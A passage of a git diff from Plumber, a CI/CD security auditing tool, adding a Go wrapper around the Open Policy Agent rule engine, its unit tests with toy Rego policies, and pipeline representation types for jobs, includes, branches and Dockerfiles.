gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+sigs.k8s.io/yaml v1.6.0 h1:G8fkbMSAFqgEFgh4b1wmtzDnioxFCUgTZhlbj5P9QYs=
+sigs.k8s.io/yaml v1.6.0/go.mod h1:796bPqUfzR/0jLAl6XjHl3Ck7MiyVv8dbTdyT3/pMf4=
diff --git a/internal/engine/opa/engine.go b/internal/engine/opa/engine.go
new file mode 100644
index 0000000..742aaab
--- /dev/null
+++ b/internal/engine/opa/engine.go
@@ -0,0 +1,311 @@
+// Package opa wraps the Open Policy Agent runtime for Plumber's rule engine.
+// Each policy is a Rego module evaluated against an ir.NormalizedPipeline and
+// emits violations through the shared "deny" rule.
+//
+// This is the Phase 0 scaffold: it can load in-memory modules and return
+// findings. Embedded policy discovery, user-policy overrides, and reporter
+// integration land in later phases.
+package opa
+
+import (
+ "bytes"
+ "cmp"
+ "context"
+ "encoding/json"
+ "fmt"
+ "io/fs"
+ "slices"
+ "sort"
+ "strings"
+
+ "github.com/open-policy-agent/opa/v1/rego"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+// Finding is a single rule violation emitted by a policy.
+// File and Line, when populated, point at the exact location of the
+// offending job in the source workflow/pipeline file so editors and
+// terminals can render a clickable file:line link.
+//
+// Data carries policy-specific structured payload (variable name,
+// affected image link, location, ...) emitted by the Rego rule next
+// to the canonical fields. It serialises inline at the top level so
+// downstream consumers can read both the human message and the
+// machine-parseable evidence on the same finding object.
+//
+// Every field is deliberately tagged `json:"-"`: serialisation goes
+// exclusively through the custom MarshalJSON/UnmarshalJSON below,
+// which flatten the canonical fields and Data into one JSON object.
+type Finding struct {
+	Code     string         `json:"-"`
+	Severity string         `json:"-"`
+	Message  string         `json:"-"`
+	Job      string         `json:"-"`
+	File     string         `json:"-"`
+	Line     int            `json:"-"`
+	Data     map[string]any `json:"-"`
+}
+
+// MarshalJSON flattens the canonical fields and the Data payload into
+// a single object so structured keys appear at the top level (the
+// shape pre-Rego consumers parsed). Empty canonical fields are
+// omitted, mirroring the previous `omitempty` tags. A canonical field
+// always wins over a Data entry with the same key.
+func (f Finding) MarshalJSON() ([]byte, error) {
+	merged := make(map[string]any, len(f.Data)+6)
+	for key, value := range f.Data {
+		merged[key] = value
+	}
+	// Canonical string fields, written only when non-empty.
+	canonical := map[string]string{
+		"code":     f.Code,
+		"severity": f.Severity,
+		"message":  f.Message,
+		"job":      f.Job,
+		"file":     f.File,
+	}
+	for key, value := range canonical {
+		if value != "" {
+			merged[key] = value
+		}
+	}
+	if f.Line != 0 {
+		merged["line"] = f.Line
+	}
+	return json.Marshal(merged)
+}
+
+// UnmarshalJSON splits an incoming flat object into the canonical
+// fields and the Data bag. Unknown keys land in Data so they survive
+// a round-trip even when added by future rules; a known key whose
+// value has an unexpected JSON type is likewise left in Data.
+func (f *Finding) UnmarshalJSON(b []byte) error {
+	var raw map[string]any
+	if err := json.Unmarshal(b, &raw); err != nil {
+		return err
+	}
+	// takeString claims a key from raw when it decoded as a string.
+	takeString := func(key string) (string, bool) {
+		value, ok := raw[key].(string)
+		if ok {
+			delete(raw, key)
+		}
+		return value, ok
+	}
+	if value, ok := takeString("code"); ok {
+		f.Code = value
+	}
+	if value, ok := takeString("severity"); ok {
+		f.Severity = value
+	}
+	if value, ok := takeString("message"); ok {
+		f.Message = value
+	}
+	if value, ok := takeString("job"); ok {
+		f.Job = value
+	}
+	if value, ok := takeString("file"); ok {
+		f.File = value
+	}
+	// encoding/json decodes all JSON numbers into float64.
+	if value, ok := raw["line"].(float64); ok {
+		f.Line = int(value)
+		delete(raw, "line")
+	}
+	if len(raw) > 0 {
+		f.Data = raw
+	}
+	return nil
+}
+
+// Engine evaluates Rego policies against an IR pipeline.
+// The zero value is unusable; construct with New.
+type Engine struct {
+	modules map[string]string
+}
+
+// New returns an Engine with no policies loaded.
+func New() *Engine {
+	return &Engine{modules: make(map[string]string)}
+}
+
+// LoadModule registers a Rego module under the given logical name. The name
+// must match the module's package path (the "deny" rule is queried at
+// data.<name>.deny). Registering the same name again replaces the
+// earlier source.
+func (e *Engine) LoadModule(name, source string) {
+	e.modules[name] = source
+}
+
+// LoadFromFS loads every .rego file at the root of fsys. The module's
+// logical name is the file's base name without its extension. Nested
+// subdirectories are ignored for now; the concern-based layout lands
+// with the first real policies in Phase 2.
+func (e *Engine) LoadFromFS(fsys fs.FS) error {
+	entries, err := fs.ReadDir(fsys, ".")
+	if err != nil {
+		return fmt.Errorf("read policies dir: %w", err)
+	}
+	for _, entry := range entries {
+		if entry.IsDir() {
+			continue
+		}
+		fileName := entry.Name()
+		name := strings.TrimSuffix(fileName, ".rego")
+		// Skip non-policy files (TrimSuffix left the name unchanged)
+		// and a file named exactly ".rego": an empty module name
+		// would later build the invalid query "data..deny" at
+		// evaluation time.
+		if name == fileName || name == "" {
+			continue
+		}
+		content, err := fs.ReadFile(fsys, fileName)
+		if err != nil {
+			return fmt.Errorf("read policy %q: %w", fileName, err)
+		}
+		e.LoadModule(name, string(content))
+	}
+	return nil
+}
+
+// Evaluate runs every loaded policy against pipeline and returns the
+// aggregated findings. Policies see a two-field input:
+//
+//	input.pipeline — the NormalizedPipeline
+//	input.config   — an arbitrary map forwarded from .plumber.yaml
+//
+// config may be nil. Pipeline must not be nil.
+//
+// Modules are evaluated in lexical name order so findings (and any
+// module error) are deterministic run-to-run; findings are then
+// enriched with job file:line locations and sorted before returning.
+func (e *Engine) Evaluate(ctx context.Context, pipeline *ir.NormalizedPipeline, config map[string]any) ([]Finding, error) {
+	if pipeline == nil {
+		return nil, fmt.Errorf("evaluate: nil pipeline")
+	}
+
+	input, err := buildInput(pipeline, config)
+	if err != nil {
+		return nil, fmt.Errorf("evaluate: build input: %w", err)
+	}
+
+	// Sort module names for a deterministic evaluation order.
+	names := make([]string, 0, len(e.modules))
+	for name := range e.modules {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+
+	var findings []Finding
+	for _, name := range names {
+		source := e.modules[name]
+		moduleFindings, err := evalModule(ctx, name, source, input)
+		if err != nil {
+			return nil, fmt.Errorf("evaluate module %q: %w", name, err)
+		}
+		findings = append(findings, moduleFindings...)
+	}
+	enrichFindingsWithJobLocation(findings, pipeline)
+	sortFindingsInPlace(findings)
+	return findings, nil
+}
+
+// sortFindingsInPlace orders findings deterministically for stable
+// JSON and CLI output.
+func sortFindingsInPlace(findings []Finding) {
+	slices.SortFunc(findings, compareFindings)
+}
+
+// compareFindings orders two findings by code, then job, file, line,
+// severity, message, and finally by the canonical JSON rendering of
+// the Data payload, so even otherwise-identical findings sort stably.
+func compareFindings(a, b Finding) int {
+	if c := cmp.Compare(a.Code, b.Code); c != 0 {
+		return c
+	}
+	if c := cmp.Compare(a.Job, b.Job); c != 0 {
+		return c
+	}
+	if c := cmp.Compare(a.File, b.File); c != 0 {
+		return c
+	}
+	if c := cmp.Compare(a.Line, b.Line); c != 0 {
+		return c
+	}
+	if c := cmp.Compare(a.Severity, b.Severity); c != 0 {
+		return c
+	}
+	if c := cmp.Compare(a.Message, b.Message); c != 0 {
+		return c
+	}
+	return bytes.Compare(marshalDataForSort(a.Data), marshalDataForSort(b.Data))
+}
+
+// marshalDataForSort renders Data as JSON purely for ordering
+// (json.Marshal emits map keys sorted, so the rendering is
+// canonical). A payload that fails to marshal collapses to an empty
+// slice, which still yields a total order.
+func marshalDataForSort(d map[string]any) []byte {
+	if len(d) == 0 {
+		return []byte("{}")
+	}
+	raw, err := json.Marshal(d)
+	if err != nil {
+		return nil
+	}
+	return raw
+}
+
+// docURLBase is the canonical issues documentation root. Every
+// finding gets a `docUrl` derived from its code so consumers (CI
+// gates, dashboards, MR comments) can link back without hard-coding
+// the format on their side.
+const docURLBase = "https://getplumber.io/docs/use-plumber/issues/"
+
+// enrichFindingsWithJobLocation fills File and Line on every finding
+// whose Job field matches a job in the pipeline — saving every policy
+// from emitting those fields manually. A policy may still set
+// File/Line explicitly when it knows a more precise location (e.g. a
+// specific step line); an explicit value is never overwritten. It
+// also stamps `docUrl` on every coded finding's Data bag.
+func enrichFindingsWithJobLocation(findings []Finding, pipeline *ir.NormalizedPipeline) {
+	// Phase 1: derive docUrl from the finding code.
+	for i := range findings {
+		current := &findings[i]
+		if current.Code == "" {
+			continue
+		}
+		if current.Data == nil {
+			current.Data = map[string]any{}
+		}
+		if _, present := current.Data["docUrl"]; !present {
+			current.Data["docUrl"] = docURLBase + current.Code
+		}
+	}
+	if pipeline == nil {
+		return
+	}
+	// Phase 2: resolve job names to their declaration site.
+	jobsByName := make(map[string]*ir.Job, len(pipeline.Jobs))
+	for i := range pipeline.Jobs {
+		jobsByName[pipeline.Jobs[i].Name] = &pipeline.Jobs[i]
+	}
+	for i := range findings {
+		current := &findings[i]
+		if current.Job == "" {
+			continue
+		}
+		job, found := jobsByName[current.Job]
+		if !found {
+			continue
+		}
+		if current.File == "" {
+			current.File = job.OriginFile
+		}
+		if current.Line == 0 {
+			current.Line = job.OriginLine
+		}
+	}
+}
+
+// buildInput JSON round-trips the IR so OPA sees a plain map (no Go pointers
+// or tagged fields) and nests it under "pipeline" together with the caller
+// config under "config".
+func buildInput(pipeline *ir.NormalizedPipeline, config map[string]any) (map[string]any, error) {
+ raw, err := json.Marshal(pipeline)
+ if err != nil {
+ return nil, err
+ }
+ var pipelineMap map[string]any
+ if err := json.Unmarshal(raw, &pipelineMap); err != nil {
+ return nil, err
+ }
+ return map[string]any{
+ "pipeline": pipelineMap,
+ "config": config,
+ }, nil
+}
+
+// evalModule compiles and evaluates a single Rego module against
+// input, querying the module's deny set at data.<name>.deny. The
+// module is registered under the virtual filename "<name>.rego" so
+// Rego error messages carry a recognisable source. The result set is
+// round-tripped through JSON into []Finding so each Rego object map
+// passes through Finding.UnmarshalJSON's field splitting.
+func evalModule(ctx context.Context, name, source string, input map[string]any) ([]Finding, error) {
+	r := rego.New(
+		rego.Query(fmt.Sprintf("data.%s.deny", name)),
+		rego.Module(name+".rego", source),
+		rego.Input(input),
+	)
+	rs, err := r.Eval(ctx)
+	if err != nil {
+		return nil, err
+	}
+	// An undefined deny rule yields an empty result set: no violations.
+	if len(rs) == 0 || len(rs[0].Expressions) == 0 {
+		return nil, nil
+	}
+	raw, err := json.Marshal(rs[0].Expressions[0].Value)
+	if err != nil {
+		return nil, fmt.Errorf("marshal findings: %w", err)
+	}
+	var findings []Finding
+	if err := json.Unmarshal(raw, &findings); err != nil {
+		return nil, fmt.Errorf("unmarshal findings: %w", err)
+	}
+	return findings, nil
+}
diff --git a/internal/engine/opa/engine_test.go b/internal/engine/opa/engine_test.go
new file mode 100644
index 0000000..73d0812
--- /dev/null
+++ b/internal/engine/opa/engine_test.go
@@ -0,0 +1,179 @@
+package opa
+
+import (
+ "context"
+ "testing"
+ "testing/fstest"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+// TestEvaluateNoModules verifies an engine with zero policies loaded
+// still evaluates cleanly and reports no findings.
+func TestEvaluateNoModules(t *testing.T) {
+	eng := New()
+	p := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+
+	findings, err := eng.Evaluate(context.Background(), p, nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if n := len(findings); n != 0 {
+		t.Fatalf("expected no findings, got %d", n)
+	}
+}
+
+// TestEvaluateToyPolicy exercises the happy path end to end: a
+// minimal module whose deny rule fires on a GitLab pipeline must
+// yield exactly one finding with its canonical fields decoded.
+func TestEvaluateToyPolicy(t *testing.T) {
+	const module = `package toy
+
+deny contains finding if {
+	input.pipeline.provider == "gitlab"
+	finding := {
+		"code": "TOY-001",
+		"severity": "low",
+		"message": "gitlab pipeline detected",
+	}
+}`
+
+	engine := New()
+	engine.LoadModule("toy", module)
+
+	pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+	findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(findings) != 1 {
+		t.Fatalf("expected 1 finding, got %d", len(findings))
+	}
+	got := findings[0]
+	if got.Code != "TOY-001" {
+		t.Fatalf("expected code TOY-001, got %q", got.Code)
+	}
+	if got.Severity != "low" {
+		t.Fatalf("expected severity low, got %q", got.Severity)
+	}
+}
+
+// TestEvaluateNilPipeline pins the guard clause: Evaluate must refuse
+// a nil pipeline with an error rather than failing downstream.
+func TestEvaluateNilPipeline(t *testing.T) {
+	engine := New()
+	if _, err := engine.Evaluate(context.Background(), nil, nil); err == nil {
+		t.Fatal("expected error for nil pipeline")
+	}
+}
+
+// TestEvaluateConfigIsExposed verifies the caller-supplied config map
+// is visible to policies as input.config.
+func TestEvaluateConfigIsExposed(t *testing.T) {
+	const module = `package cfgtest
+
+deny contains finding if {
+	input.config.threshold > 0
+	finding := {
+		"code": "CFG-001",
+		"severity": "low",
+		"message": sprintf("threshold is %d", [input.config.threshold]),
+	}
+}`
+
+	engine := New()
+	engine.LoadModule("cfgtest", module)
+
+	pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+	cfg := map[string]any{"threshold": 5}
+
+	findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(findings) != 1 {
+		t.Fatalf("expected 1 finding, got %d", len(findings))
+	}
+	if findings[0].Code != "CFG-001" {
+		t.Fatalf("expected code CFG-001, got %q", findings[0].Code)
+	}
+}
+
+// TestEvaluateFindingsSorted verifies findings from multiple modules
+// come back sorted by code, independent of module registration order.
+func TestEvaluateFindingsSorted(t *testing.T) {
+	const zebra = `package zebra
+
+deny contains finding if {
+	input.pipeline.provider == "gitlab"
+	finding := {"code": "ZEB-001", "severity": "low", "message": "zebra"}
+}`
+	const alpha = `package alpha
+
+deny contains finding if {
+	input.pipeline.provider == "gitlab"
+	finding := {"code": "ALP-001", "severity": "low", "message": "alpha"}
+}`
+
+	engine := New()
+	engine.LoadModule("zebra", zebra)
+	engine.LoadModule("alpha", alpha)
+
+	pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+	findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(findings) != 2 {
+		t.Fatalf("expected 2 findings, got %d", len(findings))
+	}
+	if findings[0].Code != "ALP-001" || findings[1].Code != "ZEB-001" {
+		t.Fatalf("expected findings sorted by code ALP-001 then ZEB-001, got %q then %q",
+			findings[0].Code, findings[1].Code)
+	}
+}
+
+// TestEvaluateFindingsSortedTieBreakByJob verifies the secondary sort
+// key: findings with equal codes fall back to ordering by Job.
+func TestEvaluateFindingsSortedTieBreakByJob(t *testing.T) {
+	const mod = `package tiebreak
+
+deny contains finding if {
+	input.pipeline.provider == "gitlab"
+	finding := {"code": "SAME", "job": "zzz"}
+}
+
+deny contains finding if {
+	input.pipeline.provider == "gitlab"
+	finding := {"code": "SAME", "job": "aaa"}
+}
+`
+
+	engine := New()
+	engine.LoadModule("tiebreak", mod)
+	pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+	findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(findings) != 2 {
+		t.Fatalf("expected 2 findings, got %d", len(findings))
+	}
+	if findings[0].Job != "aaa" || findings[1].Job != "zzz" {
+		t.Fatalf("expected tie-break by job: aaa then zzz, got %q then %q",
+			findings[0].Job, findings[1].Job)
+	}
+}
+
+// TestLoadFromFS verifies only top-level *.rego files are loaded and
+// that each module is keyed by its base name without the extension.
+func TestLoadFromFS(t *testing.T) {
+	fsys := fstest.MapFS{
+		"first.rego":  &fstest.MapFile{Data: []byte("package first")},
+		"second.rego": &fstest.MapFile{Data: []byte("package second")},
+		"ignored.txt": &fstest.MapFile{Data: []byte("should not be loaded")},
+	}
+
+	engine := New()
+	if err := engine.LoadFromFS(fsys); err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if _, ok := engine.modules["first"]; !ok {
+		t.Error("first.rego should be loaded as module \"first\"")
+	}
+	if _, ok := engine.modules["second"]; !ok {
+		t.Error("second.rego should be loaded as module \"second\"")
+	}
+	if _, ok := engine.modules["ignored"]; ok {
+		t.Error("non-.rego files must be skipped")
+	}
+	if len(engine.modules) != 2 {
+		t.Errorf("expected exactly 2 modules, got %d", len(engine.modules))
+	}
+}
diff --git a/internal/ir/pipeline.go b/internal/ir/pipeline.go
new file mode 100644
index 0000000..92e3851
--- /dev/null
+++ b/internal/ir/pipeline.go
@@ -0,0 +1,296 @@
+// Package ir defines the provider-agnostic intermediate representation of a
+// CI/CD pipeline. Provider collectors produce an *ir.NormalizedPipeline that
+// the OPA rule engine consumes regardless of the source.
+package ir
+
+// Provider identifies the CI/CD platform that originated a pipeline.
+// The string value appears verbatim in the serialised IR, so Rego
+// policies can match it directly (input.pipeline.provider).
+type Provider string
+
+// Supported providers.
+const (
+	ProviderGitLab Provider = "gitlab"
+	ProviderGitHub Provider = "github"
+)
+
+// NormalizedPipeline is the provider-agnostic view of a CI/CD pipeline.
+// Provider-specific data that does not fit the shared fields lives in Raw.
+type NormalizedPipeline struct {
+	Provider      Provider          `json:"provider"`
+	ProjectPath   string            `json:"projectPath,omitempty"`
+	DefaultBranch string            `json:"defaultBranch,omitempty"`
+	Jobs          []Job             `json:"jobs,omitempty"`
+	Includes      []Include         `json:"includes,omitempty"`
+	Branches      []Branch          `json:"branches,omitempty"`
+	Dependabot    *DependabotConfig `json:"dependabot,omitempty"`
+
+	// GlobalVariables are pipeline-level variables declared at the top
+	// of the source (e.g. `variables:` block at the root of
+	// .gitlab-ci.yml). Rules that scan for forbidden values
+	// (CI_DEBUG_TRACE, secret-name patterns, controlled overrides) read
+	// both these globals and the per-job Variables map.
+	GlobalVariables map[string]string `json:"globalVariables,omitempty"`
+
+	// RenovateConfigPath is the file path where a Renovate config was
+	// discovered (`renovate.json`, `.renovaterc`, `renovate.json5`,
+	// ...). Empty when no Renovate config is present.
+	RenovateConfigPath string `json:"renovateConfigPath,omitempty"`
+
+	// SecurityPolicyPath is the path of the repository's SECURITY.md
+	// (root, .github/, or docs/). Empty when the file is absent.
+	SecurityPolicyPath string `json:"securityPolicyPath,omitempty"`
+
+	// Dockerfiles lists every Dockerfile the collector scanned at the
+	// repo root and under common build directories, with each FROM
+	// base-image extracted so policies can check pinning state.
+	Dockerfiles []Dockerfile `json:"dockerfiles,omitempty"`
+
+	// Raw holds provider-specific leftovers with no shared field.
+	Raw map[string]any `json:"raw,omitempty"`
+}
+
+// Dockerfile captures the result of parsing a single Dockerfile's
+// FROM directives for supply-chain auditing.
+type Dockerfile struct {
+	Path  string           `json:"path"`
+	Bases []DockerfileBase `json:"bases,omitempty"`
+}
+
+// DockerfileBase is one FROM line. PinnedByDigest is true when the
+// base image is referenced via `image@sha256:...` (immutable);
+// otherwise the tag (or default-tag) form lets the registry serve a
+// different layer for the same name.
+type DockerfileBase struct {
+	Image          string `json:"image"`
+	Line           int    `json:"line"`
+	PinnedByDigest bool   `json:"pinnedByDigest,omitempty"`
+}
+
+// DependabotConfig captures the bits of .github/dependabot.yml that
+// feed the dependabot-* policies. Populated by the GitHub collector
+// when the file exists; nil otherwise.
+type DependabotConfig struct {
+	Path                   string   `json:"path"`
+	InsecureExecEcosystems []string `json:"insecureExecEcosystems,omitempty"`
+	// MissingCooldownEcosystems lists ecosystems in the config that
+	// have no `cooldown:` block. A cooldown window gives security
+	// advisory pipelines time to flag a bad release before
+	// Dependabot's PR automation picks it up.
+	MissingCooldownEcosystems []string `json:"missingCooldownEcosystems,omitempty"`
+}
+
+// Job is a single pipeline unit of work.
+type Job struct {
+	Name     string   `json:"name"`
+	Image    *Image   `json:"image,omitempty"`
+	Services []Image  `json:"services,omitempty"`
+	Scripts  []string `json:"scripts,omitempty"`
+	// ScriptBlocks names the source block ("before_script", "script",
+	// "after_script") for each entry of Scripts, in the same order.
+	// Lets script-scanning policies surface where the offending line
+	// lives so legacy consumers (the Rego-port issue payload) can
+	// echo the v0.2.x scriptBlock attribute. Empty when the collector
+	// did not track origins (older fixtures).
+	ScriptBlocks []string          `json:"scriptBlocks,omitempty"`
+	AllowFailure bool              `json:"allowFailure,omitempty"`
+	When         string            `json:"when,omitempty"`
+	Variables    map[string]string `json:"variables,omitempty"`
+	// LocalVariables is the raw `variables:` map authored by the
+	// project itself (root .gitlab-ci.yml or workflow file), before any
+	// merge with upstream component/template definitions. Empty when
+	// the user did not declare a `variables:` block on this job —
+	// distinguishing "user wrote SAST_DISABLED here" from "upstream
+	// template ships SAST_DISABLED". Variable-override policies must
+	// read this field, never the merged Variables, to avoid punishing
+	// projects for variables their upstream catalogs already set.
+	LocalVariables map[string]string `json:"localVariables,omitempty"`
+	// Rules captures the job's `rules:` block (GitLab CI). Each entry
+	// is a {if, when, allow_failure, exists, changes, ...} map; rules
+	// such as `- when: never` neutralise the job at runtime even when
+	// the job is otherwise correctly configured. Policies that care
+	// about effective execution (security-job weakening) read this
+	// list and reject any rule whose terminal `when` would prevent
+	// the job from running.
+	Rules      []map[string]any `json:"rules,omitempty"`
+	OriginFile string           `json:"originFile,omitempty"`
+	OriginLine int              `json:"originLine,omitempty"`
+	OriginKind string           `json:"originKind,omitempty"`
+	// Overridden is true when the job inherits from an upstream
+	// component or template but the project locally redefined some of
+	// its keys. Lets policies distinguish "user-authored override" from
+	// "vanilla upstream definition" — the rules-redefinition guard in
+	// security_jobs_weakened depends on this signal.
+	Overridden bool `json:"overridden,omitempty"`
+	// OverriddenKeys lists the specific job-level keys the project
+	// redefined when overriding an upstream definition (`rules`,
+	// `image`, `when`, ...). Empty when the job was not overridden,
+	// which lets policies target a particular kind of override
+	// (rules redefinition, image substitution, ...) without flagging
+	// every override globally.
+	OverriddenKeys []string `json:"overriddenKeys,omitempty"`
+
+	// Permissions are the job's effective permissions as declared in the
+	// source provider. For GitHub Actions this is the job-level block if
+	// present, otherwise the inherited workflow-level block. The value may
+	// be a string shortcut ("write-all", "read-all") or a map of scope
+	// names to access level — policies are expected to handle both.
+	Permissions any `json:"permissions,omitempty"`
+
+	// Triggers are the event names under which the enclosing workflow runs
+	// (for GitHub Actions, the `on:` section of the workflow file). The
+	// collector propagates them to every job of the workflow. GitLab jobs
+	// leave this field empty: the concept maps poorly onto GitLab's
+	// `workflow.rules` and `only/except` semantics, and the few rules that
+	// care about triggers are GitHub-specific.
+	Triggers []string `json:"triggers,omitempty"`
+
+	// Uses lists every third-party action referenced by the job's steps
+	// (for GitHub Actions, `jobs.<job_id>.steps[*].uses` with its
+	// accompanying `with:` block). Empty for GitLab jobs, which model
+	// external code through `include:` instead (already covered by the
+	// pipeline Includes list).
+	Uses []Action `json:"uses,omitempty"`
+
+	// ReusableWorkflowUses is the `uses:` declared at the job level (not
+	// the step level). Populated only for GitHub Actions jobs that are
+	// reusable-workflow calls: `jobs.<job_id>.uses:
+	// owner/repo/.github/workflows/x.yml@<ref>`. Empty for every other
+	// job type.
+	ReusableWorkflowUses string `json:"reusableWorkflowUses,omitempty"`
+
+	// SecretsInherit is true when a reusable-workflow call forwards
+	// every caller-visible secret to the callee via `secrets: inherit`.
+	// Only meaningful when ReusableWorkflowUses is set.
+	SecretsInherit bool `json:"secretsInherit,omitempty"`
+
+	// Conditions collects every `if:` expression attached to the job
+	// (job-level + each step's). Kept as raw YAML strings so Rego
+	// policies can match them with regular expressions — no attempt
+	// at GitHub-expression-language parsing at the collector level.
+	Conditions []string `json:"conditions,omitempty"`
+
+	// WorkflowName is the value of the top-level `name:` field of the
+	// enclosing workflow. Empty when the workflow has no explicit
+	// name (GitHub falls back to the file path in the UI). Propagated
+	// to every job of the workflow by the collector.
+	WorkflowName string `json:"workflowName,omitempty"`
+
+	// WorkflowHasConcurrency is true when the enclosing workflow
+	// declares a top-level `concurrency:` block. Job-level
+	// concurrency is tracked separately via JobHasConcurrency.
+	WorkflowHasConcurrency bool `json:"workflowHasConcurrency,omitempty"`
+
+	// JobHasConcurrency is true when the job has its own
+	// `concurrency:` block, independent of the workflow-level one.
+	JobHasConcurrency bool `json:"jobHasConcurrency,omitempty"`
+
+	// Environment is the `environment:` field declared on the job
+	// (GitHub Actions deployment environment gate). Accepts both the
+	// `environment: production` shorthand and the long form — the
+	// collector keeps only the name. Empty when no environment is set.
+	Environment string `json:"environment,omitempty"`
+}
+
+// Action is a single invocation of a reusable third-party action.
+// Uses is the full ref ("owner/repo@v4" or "owner/repo@<sha>"), With
+// is the raw `with:` map (scope values may be strings, bools or
+// numbers, hence `any`).
+//
+// Metadata, when present, carries facts resolved against the
+// GitHub API (archived repo, ref kind, tag SHA). Zero-valued
+// Metadata — or a nil pointer — means the collector did not look
+// it up (no token, offline run, non-GitHub action). Policies that
+// key on API evidence should treat absence as "unknown" and stay
+// silent to avoid false positives.
+//
+// Comment holds the trailing `# comment` that workflow authors
+// commonly add behind a hash-pinned reference to document the
+// human-readable version (e.g. `@abc123... # v4.1.0`). Kept as the
+// raw string after stripping leading whitespace + `#`.
+type Action struct {
+	Uses string         `json:"uses"`
+	With map[string]any `json:"with,omitempty"`
+	// Line is the 1-based line number of the `uses:` directive in the
+	// source workflow file. Populated by the provider collector so
+	// action-level findings can point the reviewer at the exact step
+	// instead of the surrounding job header. Zero when unknown.
+	Line     int             `json:"line,omitempty"`
+	Metadata *ActionMetadata `json:"metadata,omitempty"`
+	Comment  string          `json:"comment,omitempty"`
+}
+
+// ActionMetadata mirrors the collector-side GitHubMetadata shape.
+// Kept in internal/ir so policies can consume it via the serialised
+// JSON input without internal/ir importing the collector package.
+type ActionMetadata struct {
+	RepoArchived     bool     `json:"repoArchived,omitempty"`
+	RefExists        bool     `json:"refExists,omitempty"`
+	RefKind          string   `json:"refKind,omitempty"`
+	TagSha           string   `json:"tagSha,omitempty"`
+	LatestTag        string   `json:"latestTag,omitempty"`
+	LatestReleaseSha string   `json:"latestReleaseSha,omitempty"`
+	CommentVersion   string   `json:"commentVersion,omitempty"`
+	CommentTagSha    string   `json:"commentTagSha,omitempty"`
+	RefIsAmbiguous   bool     `json:"refIsAmbiguous,omitempty"`
+	Advisories       []string `json:"advisories,omitempty"`
+}
+
+// Image references a container image (job image, service, step base).
+// CredentialsPassword carries the literal value of the image's
+// `credentials.password` field (GitHub Actions `jobs.*.container` and
+// `services.*`). It is the raw YAML string — `${{ secrets.X }}`
+// expressions come through as the template itself, so policies can
+// distinguish a secret reference from a hard-coded literal.
+type Image struct {
+	Name                string `json:"name"`
+	Tag                 string `json:"tag,omitempty"`
+	Digest              string `json:"digest,omitempty"`
+	Registry            string `json:"registry,omitempty"`
+	CredentialsPassword string `json:"credentialsPassword,omitempty"`
+}
+
+// Include models an external pipeline fragment pulled into the current one.
+// Path is a normalized form of Source suitable for comparison against a
+// user-declared required component/template list (version suffix and
+// instance URL prefix stripped). AltPath optionally carries a second
+// candidate path — some collectors (Plumber-augmented templates)
+// know a template under two equivalent names and both should match.
+// OverriddenJobs enumerates the jobs inherited from this include whose
+// behaviour was overridden locally with one of the CI/CD keys that
+// meaningfully change semantics (script, image, rules, ...).
+type Include struct {
+	Kind          string `json:"kind"`
+	Source        string `json:"source"`
+	Ref           string `json:"ref,omitempty"`
+	Current       string `json:"current,omitempty"`
+	Path          string `json:"path,omitempty"`
+	AltPath       string `json:"altPath,omitempty"`
+	Nested        bool   `json:"nested,omitempty"`
+	ComponentName string `json:"componentName,omitempty"`
+	// OriginHash is a stable identifier for the origin of this
+	// include, used by external tooling to deduplicate the same
+	// upstream source across pipelines.
+	OriginHash     uint64          `json:"originHash,omitempty"`
+	OverriddenJobs []OverriddenJob `json:"overriddenJobs,omitempty"`
+}
+
+// OverriddenJob captures a single job whose inherited definition was
+// locally overridden. Keys is the list of CI/CD fields (script, image,
+// rules, ...) whose values were redefined in the pipeline configuration.
+type OverriddenJob struct {
+	Name string   `json:"name"`
+	Keys []string `json:"keys,omitempty"`
+}
+
+// Branch is a branch of the source repository as seen by the collector.
+// Fields beyond Name/Protected are populated from the provider's branch
+// protection API (GitLab /api/v4/projects/:id/protected_branches, the
+// GitHub equivalent, ...). They stay zero-valued when the collector did
+// not fetch protection settings.
+type Branch struct {
+	Name                      string `json:"name"`
+	Protected                 bool   `json:"protected"`
+	ProtectionPattern         string `json:"protectionPattern,omitempty"`
+	AllowForcePush            bool   `json:"allowForcePush,omitempty"`
+	CodeOwnerApprovalRequired bool   `json:"codeOwnerApprovalRequired,omitempty"`
+	MinPushAccessLevel        int    `json:"minPushAccessLevel,omitempty"`
+	MinMergeAccessLevel       int    `json:"minMergeAccessLevel,omitempty"`
+}
diff --git a/pbom/cyclonedx.go b/pbom/cyclonedx.go
index 5e245bd..8098bb8 100644
--- a/pbom/cyclonedx.go
+++ b/pbom/cyclonedx.go
@@ -13,11 +13,13 @@ const CycloneDXSpecVersion = "1.5"
// CycloneDX represents a CycloneDX SBOM
// Spec: https://cyclonedx.org/docs/1.5/json/
+// Struct field order matches a natural read path: BOM header, identifiers,
+// metadata (project/tool), dependency components last.
type CycloneDX struct {
BOMFormat string `json:"bomFormat"`
SpecVersion string `json:"specVersion"`
- SerialNumber string `json:"serialNumber"`
Version int `json:"version"`
+ SerialNumber string `json:"serialNumber"`
